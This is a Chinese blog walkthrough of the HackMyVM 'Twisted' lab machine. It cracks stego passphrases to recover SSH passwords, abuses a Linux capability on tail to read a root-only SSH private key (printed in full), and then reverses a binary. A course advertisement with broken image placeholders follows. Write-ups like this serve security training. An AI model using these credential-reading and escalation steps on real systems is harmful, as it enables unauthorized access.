HackMyVM-Twisted




---


#### WEB信息收集


##### 主页信息收集


![](https://img-blog.csdnimg.cn/direct/06231b9b57024ac2936c60de36578e00.png)



我爱小猫们!
但是我更爱这个,因为它看起来不一样!



说明什么,这个图片很有可能存在可疑信息!

我们把图一和图二都下载到本地!




---


##### 图片隐写



我用了 binwalk、exiftool、steghide等都没有发现!

使用stegseek进行爆破吧!



┌──(root㉿ru)-[~/桌面]
└─# stegseek cat-original.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: “westlife”
[i] Original filename: “markus.txt”.
[i] Extracting to “cat-original.jpg.out”.

┌──(root㉿ru)-[~/桌面]
└─# cat cat-original.jpg.out
markuslovesbonita

这个是第一张图片隐藏文件内容!



┌──(root㉿ru)-[~/桌面]
└─# stegseek cat-hidden.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: “sexymama”
[i] Original filename: “mateo.txt”.
[i] Extracting to “cat-hidden.jpg.out”.

┌──(root㉿ru)-[~/桌面]
└─# cat cat-hidden.jpg.out
thisismypassword

这是第二张图片隐藏文件的内容!




---



markus:markuslovesbonita
mateo:thisismypassword




---


##### ssh连接



┌──(root㉿0x00)-[~/HackMyVM]
└─# ssh mateo@192.168.9.146 -p 2222
The authenticity of host ‘[192.168.9.146]:2222 ([192.168.9.146]:2222)’ can’t be established.
ED25519 key fingerprint is SHA256:+Vy+50OqnmO0eOU2nhxE0uNjMjXrtpHTmrYtml4yF3s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘[192.168.9.146]:2222’ (ED25519) to the list of known hosts.
mateo@192.168.9.146’s password:
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 14 03:21:44 2020 from 192.168.1.58
mateo@twisted:~$



┌──(root㉿0x00)-[~/HackMyVM]
└─# ssh markus@192.168.9.146 -p 2222
markus@192.168.9.146’s password:
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
markus@twisted:~$



两个都能ssh登录!




---


#### 提权


##### 系统信息收集



mateo@twisted:~$ cat /etc/passwd | grep “home” | grep -v nologin
mateo❌1000:1000:mateo,:/home/mateo:/bin/bash
markus❌1001:1001:,:/home/markus:/bin/bash
bonita❌1002:1002:,:/home/bonita:/bin/bash



markus@twisted:~$ cat note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.



这两个用户都没有sudo权限,而且也没有flag!看来需要横向到 bonita用户!



markus@twisted:/var/cache/apt$ ls -al
total 62180
drwxr-xr-x 3 root root 4096 Oct 14 2020 .
drwxr-xr-x 8 root root 4096 Oct 13 2020 …
drwxr-xr-x 3 root root 12288 Oct 14 2020 archives
-rw------- 1 root root 1823 Oct 14 2020 id_rsa
-rw-r–r-- 1 root root 31831069 Oct 14 2020 pkgcache.bin
-rw-r–r-- 1 root root 31810419 Oct 14 2020 srcpkgcache.bin



查看不了!只能root用户查看!



mateo@twisted:/home/bonita$ ls
beroot user.txt
mateo@twisted:/home/bonita$ cat user.txt
cat: user.txt: Permission denied



/var/www/html/gogogo.wav
是一段音频,我使用工具audacity 进行查看音频,发现是摩斯密码!!我们再解码一下!


![](https://img-blog.csdnimg.cn/direct/cee99b498d7d4056862d42c1104b45ca.png)



G O D E E P E R . . . C O M E W I T H M E . . . L I T T L E R A B B I T . . .




---


![](https://img-blog.csdnimg.cn/direct/1dcbbab4a3f24c35999d794d40ad6eff.png)



linpeas脚本检查系统信息!


![](https://img-blog.csdnimg.cn/direct/f430cc99508b49b5a048c4e6c81b4d07.png)



Capabilities机制是在Linux内核2.2之后引入的,原理很简单,就是将之前与超级用户root(UID=0)关联的特权细分为不同的功能组,Capabilites作为线程(Linux并不真正区分进程和线程)的属性存在,每个功能组都可以独立启用和禁用。其本质上就是将内核调用分门别类,具有相似功能的内核调用被分到同一组中。

这样一来,权限检查的过程就变成了:在执行特权操作时,如果线程的有效身份不是root,就去检查其是否具有该特权操作所对应的capabilities,并以此为依据,决定是否可以执行特权操作。

如果Capabilities设置不正确,就会让攻击者有机可乘,实现权限提升。



正常情况下只有ping命令具有该权限!

所以我们可以使用tail命令突破限制!




---


##### tail突破限制


![](https://img-blog.csdnimg.cn/direct/658915519aa346209958009ceb0f89dc.png)



果然,我们可以轻松获得root和user!

但是我们还是得走个流程!




---


##### 横向移动



mateo@twisted:/tmp$ tail -n 40 /var/cache/apt/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA8NIseqX1B1YSHTz1A4rFWhjIJffs5vSbAG0Vg2iTa+xshyrmk6zd
FyguFUO7tN2TCJGTomDTXrG/KvWaucGvIAXpgV1lQsQkBV/VNrVC1Ioj/Fx3hUaSCC4PBS
olvmldJg2habNOUGA4EBKlTwfDi+vjDP8d77mF+rvA3EwR3vj37AiXFk5hBEsqr9cWeTr1
vD5282SncYtJb/Zx0eOa6VVFqDfOB7LKZA2QYIbfR7jezOdX+/nlDKX8Xp07wimFuMJpcF
gFnch7ptoxAqe0M0UIEzP+G2ull3m80G5L7Q/3acg14ULnNVs5dTJWPO2Fp7J2qKW+4A5C
tt0G5sIBpQAAA8hHx4cBR8eHAQAAAAdzc2gtcnNhAAABAQDw0ix6pfUHVhIdPPUDisVaGM
gl9+zm9JsAbRWDaJNr7GyHKuaTrN0XKC4VQ7u03ZMIkZOiYNNesb8q9Zq5wa8gBemBXWVC
xCQFX9U2tULUiiP8XHeFRpIILg8FKiW+aV0mDaFps05QYDgQEqVPB8OL6+MM/x3vuYX6u8
DcTBHe+PfsCJcWTmEESyqv1xZ5OvW8PnbzZKdxi0lv9nHR45rpVUWoN84HsspkDZBght9H
uN7M51f7+eUMpfxenTvCKYW4wmlwWAWdyHum2jECp7QzRQgTM/4ba6WXebzQbkvtD/dpyD
XhQuc1Wzl1MlY87YWnsnaopb7gDkK23QbmwgGlAAAAAwEAAQAAAQAuUW5GpLbNE2vmfbvu
U3mDy7JrQxUokrFhUpnJrYp1PoLdOI4ipyPa+VprspxevCM0ibNojtD4rJ1FKPn6cls5gI
mZ3RnFzq3S7sy2egSBlpQ3TJ2cX6dktV8kMigSSHenAwYhq2ALq4X86WksGyUsO1FvRX4/
hmJTiFsew+7IAKE+oQHMzpjMGyoiPXfdaI3sa10L2WfkKs4I4K/v/x2pW78HIktaQPutro
nxD8/fwGxQnseC69E6vdh/5tS8+lDEfYDz4oEy9AP26Hdtho0D6E9VT9T//2vynHLbmSXK
mPbr04h5i9C3h81rh4sAHs9nVAEe3dmZtmZxoZPOJKRhAAAAgFD+g8BhMCovIBrPZlHCu+
bUlbizp9qfXEc8BYZD3frLbVfwuL6dafDVnj7EqpabmrTLFunQG+9/PI6bN+iwloDlugtq
yzvf924Kkhdk+N366FLDt06p2tkcmRljm9kKMS3lBPMu9C4+fgo9LCyphiXrm7UbJHDVSP
UvPg4Fg/nqAAAAgQD9Q83ZcqDIx5c51fdYsMUCByLby7OiIfXukMoYPWCE2yRqa53PgXjh
V2URHPPhqFEa+iB138cSgCU3RxbRK7Qm1S7/P44fnWCaNu920iLed5z2fzvbTytE/h9QpJ
LlecEv2Hx03xyRZBsHFkMf+dMDC0ueU692Gl7YxRw+Lic0PQAAAIEA82v3Ytb97SghV7rz
a0S5t7v8pSSYZAW0OJ3DJqaLtEvxhhomduhF71T0iw0wy8rSH7j2M5PGCtCZUa2/OqQgKF
eERnqQPQSgM0PrATtihXYCTGbWo69NUMcALah0gT5i6nvR1Jr4220InGZEUWHLfvkGTitu
D0POe+rjV4B7EYkAAAAOYm9uaXRhQHR3aXN0ZWQBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----


![](https://img-blog.csdnimg.cn/direct/666eff16ade24472bee4618ebf78fe49.png)



bonita@twisted:~$ ./beroot
Enter the code:
root

WRONG

把这个文件下载到本地,进行分析!


![](https://img-blog.csdnimg.cn/direct/e10339a2f0694d32a901a65e22c78127.png)



按住F12进行反编译,我们得到main方法的伪代码! 0x16f8则是我们需要找的!


![](https://img-blog.csdnimg.cn/direct/ba7d95e11c50490c9cde60b286fbbf32.png)



最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

afiaGf-1715848306571)]

[外链图片转存中…(img-ZcgkdrLp-1715848306571)]

[外链图片转存中…(img-tbjEMPC0-1715848306571)]

[外链图片转存中…(img-U0Su92b9-1715848306571)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值